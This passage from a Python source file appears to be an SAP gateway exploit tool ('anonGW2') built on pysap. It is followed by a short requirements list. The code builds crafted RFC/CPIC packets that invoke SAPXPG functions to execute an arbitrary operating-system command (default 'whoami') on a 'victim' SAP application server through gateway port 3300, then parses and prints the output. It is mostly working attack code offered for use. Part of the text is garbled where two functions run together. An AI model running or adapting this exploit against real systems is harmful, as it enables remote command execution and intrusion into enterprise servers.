suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', 425 | ) 426 | 427 | 428 | cpic2 = SAPCPIC2( 429 | cpic_padd015_1='\x01\x36', 430 | some_cpic_params=cpic_params, 431 | cpic_padd016='\x01\x36\x05\x02', 432 | cpic_convid_label='', 433 | cpic_padd017='\x05\x02\x00\x0b', 434 | cpic_kernel3=attacked_gw['kernel'], 435 | cpic_padd018 = '\x00\x0b\x01\x02', 436 | cpic_RFC_f='SAPXPG_END_XPG', 437 | cpic_padd019='\x01\x02\x05\x03', 438 | cpic_unk4='', 439 | cpic_padd021='\x05\x03\x05\x14', 440 | some_cpic_params2=cpic_params2, 441 | cpic_padd022='\x05\x14\x04\x20', 442 | cpic_unk6='\x00\x00\x00\x00', 443 | cpic_padd023='\x04\x20\x05\x12', 444 | cpic_unk7='', 445 | xpg_end = sap_xpg_end, 446 | cpic_padd024='\x03\x02\x01\x04', 447 | cpic_suff=cpic_suf, 448 | cpic_end_padd='\x01\x04\xff\xff', 449 | cpic_end='', 450 | cpic_end_sig='\xff\xff\x00\x00', 451 | ) 452 | 453 | p4 = SAPRFC(version=6, 454 | func_type='F_SAP_SEND', 455 | protocol='CPIC', 456 | mode=0, 457 | uid=19, 458 | gw_id=1, 459 | err_len=0, 460 | info2=0, 461 | trace_level=0, 462 | time=0, 463 | info3=0, 464 | timeout=500, 465 | info4=0, 466 | seq_no=0, 467 | sap_param_len=8, 468 | padd_appc=0, 469 | info='SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', 470 | vector='F_V_SEND_DATA+F_V_RECEIVE', 471 | appc_rc='CM_OK', 472 | sap_rc=0, 473 | conv_id=conv_id, 474 | cm_ok_padd='\x00' * 31 + '\x02', 475 | sap_cpic_cut=cpic2, 476 | cpic_packet_size=len(cpic2), 477 | rfc_packet_size=28000, 478 | ) 479 | #p4.show2() 480 | return p4 481 | 482 | def print_error(error_msg): 483 | err = error_msg.split('\x00') 484 | print 'Got Error!' 485 | print 'LOCATION: {}\n' \ 486 | 'ERROR: {}\n' \ 487 | 'TIME: {}\n' \ 488 | 'RELEASE: {}\n' \ 489 | 'COMPONENT: {}\n' \ 490 | 'VERSION: {}\n' \ 491 | 'RC: {}\n' \ 492 | 'MODULE: {}\n' \ 493 | 'LINE: {}\n' \ 494 | 'DETAILS: {}\n' \ 495 | 'COUNTER: {}\n'.format(err[15], err[2], err[10], err[5], err[4], err[6], err[3], err[7], err[8], err[9], 496 | err[14]) 497 | 498 | 499 | def gw_connect(gwhost, gwport, init_packet): 500 | try: 501 | s = SAPNIStreamSocket.get_nisocket(gwhost, gwport) 502 | except socket.error: 503 | logger.error("[!] Connection error to %s:%s" % (gwhost, gwport)) 504 | exit(-1) 505 | logger.info('[+] Sending GW_NORMAL_CLIENT') 506 | r = s.sr(init_packet) 507 | handle_resp(r, "GW_NORMAL_CLIENT") 508 | return s 509 | 510 | 511 | def init_logger(logname, level): 512 | # generic log conf 513 | logger = logging.getLogger(logname) 514 | logger.setLevel(level) 515 | console_format = logging.Formatter("[%(levelname)-5s] %(message)s") 516 | # console handler 517 | ch = logging.StreamHandler(sys.stdout) 518 | ch.setLevel(level) 519 | ch.setFormatter(console_format) 520 | logger.addHandler(ch) 521 | return logger 522 | 523 | 524 | def handle_resp(r, pkt): 525 | logger.debug('Response on {}:\n{}'.format(pkt, r.show(dump=True))) 526 | if r[SAPRFC].error_msg: 527 | print_error(r[SAPRFC].error_msg) 528 | else: 529 | logger.info('Response: OK') 530 | 531 | 532 | def parse_fields(pkt, lines): 533 | result=[] 534 | logger.debug("Starting decompression") 535 | d = SAPDiag() 536 | (sig, compressed_len) = unpack('>4sI', pkt[0:8]) 537 | (uncompressed_len,) = unpack('i',r.repl[7].start_field1[4:])[0] 551 | resp_start=r.repl.index(field)+1 552 | if r.repl[resp_start].start_padd[2:] == '\x03\x05': 553 | resp_type = 'compressed' 554 | elif r.repl[resp_start].start_padd[2:] == '\x03\x04': 555 | resp_type = 'raw' 556 | else: 557 | print '[!] Error. Wrong resp_type' 558 | break 559 | logger.debug('Response parameters:\nlines = {}\ntype = {}\n'.format(resp_lines, resp_type)) 560 | if not resp_lines and not resp_type: 561 | print '[!] Error. resp_lines = 0 or resp_type = 0' 562 | exit(0) 563 | result = [] 564 | for resp in r.repl[resp_start:]: 565 | if resp.start_padd[2:] == '\x03\x05' or resp.start_padd[2:] == '\x03\x04': 566 | result.append(resp.start_field1) 567 | if resp_type == 'compressed': 568 | result=parse_fields(''.join(result),resp_lines) 569 | return '\n'.join(result) 570 | 571 | if __name__ == '__main__': 572 | parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter) 573 | parser.add_argument('-t', '--ip', default='172.16.30.118', help='AS victim IP (default: 172.16.30.118)') 574 | parser.add_argument('-p', '--port', default=3300, type=int, help='SAP gateway port (default: 3300)') 575 | parser.add_argument('-s', '--sid', default='CL1', help='SAP victim SID (default: CL1)') 576 | parser.add_argument('-I', '--instance', default='00', help='SAP victim targeted instance (default: 00)') 577 | parser.add_argument('-c', '--cmd', default='whoami', help='Command that be executed') 578 | parser.add_argument('-d', '--debug', action='store_true', help='Show debug info') 579 | parser.add_argument('-q', '--quiet', action='store_true', help='Don\'t show any info messages') 580 | 581 | args = parser.parse_args() 582 | prog = 'anonGW2' 583 | if args.quiet: 584 | logger = init_logger(prog, logging.NOTSET) 585 | elif args.debug: 586 | logger = init_logger(prog, logging.DEBUG) 587 | else: 588 | logger = init_logger(prog, logging.INFO) 589 | 590 | # setup our target 591 | 592 | attacked_gw['ip'] = args.ip 593 | attacked_gw['port'] = args.port 594 | attacked_gw['sid'] = args.sid 595 | attacked_gw['instance'] = args.instance 596 | cmd = args.cmd.split()[0] 597 | cmd_params = args.cmd[len(cmd) + 1:] 598 | 599 | 600 | conf.L3Socket = StreamSocket 601 | bind_layers(TCP, SAPNI) 602 | bind_layers(SAPNI, SAPRFC) 603 | 604 | # 1 - send GW_NORMAL_CLIENT 605 | s = gw_connect(attacked_gw['ip'], attacked_gw['port'], build_p1(attacked_gw['ip'], attacked_gw['instance'])) 606 | 607 | # 2 - send F_SAP_INIT 608 | logger.info("[+] Sending F_SAP_INIT") 609 | r = s.sr(build_p2()) 610 | handle_resp(r, "F_SAP_INIT") 611 | conv_id = r['SAPRFC'].conv_id 612 | logger.debug('Got conv_id = {}'.format(conv_id)) 613 | 614 | # 3 - send F_SAP_SEND 615 | logger.info("[+] Sending F_SAP_SEND") 616 | r = s.sr(buld_p3(conv_id)) 617 | #handle_resp(r, "F_SAP_SEND") 618 | 619 | # 4 - send F_SAP_SEND2 620 | logger.info("[+] Sending F_SAP_SEND2") 621 | r = s.sr(buld_p4(conv_id)) 622 | #handle_resp(r, "F_SAP_SEND2") 623 | 624 | # 5 - print result 625 | print parce_answer(r) -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pysap 2 | ansicolor --------------------------------------------------------------------------------